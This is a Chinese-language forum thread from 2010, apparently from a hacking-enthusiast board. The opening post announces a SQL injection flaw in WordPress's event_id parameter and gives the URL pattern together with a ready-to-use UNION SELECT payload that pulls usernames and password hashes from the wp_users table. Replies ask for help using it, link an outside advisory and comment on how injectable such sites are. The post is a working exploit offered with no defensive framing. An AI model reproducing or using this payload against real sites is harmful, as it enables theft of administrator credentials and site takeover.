Board logo

标题: WordPress最新event_id注入漏洞 [打印本页]

作者: 柔肠寸断    时间: 2010-2-7 10:58     标题: WordPress最新event_id注入漏洞

===[ Exploit ]===

www.WordPress.com/?event_id=[Sql]

www.WordPress.com/Path/?event_id=[Sql]

Exploit:

null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
作者: 海豚    时间: 2010-2-7 14:31

1# 柔肠寸断


师傅能这个漏洞吗
作者: baiyin    时间: 2010-2-8 10:57

http://www.venustech.com.cn/NewsInfo/124/5957.Html
作者: hyrz    时间: 2010-2-14 13:21

这样的站点都能注入,汗!




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2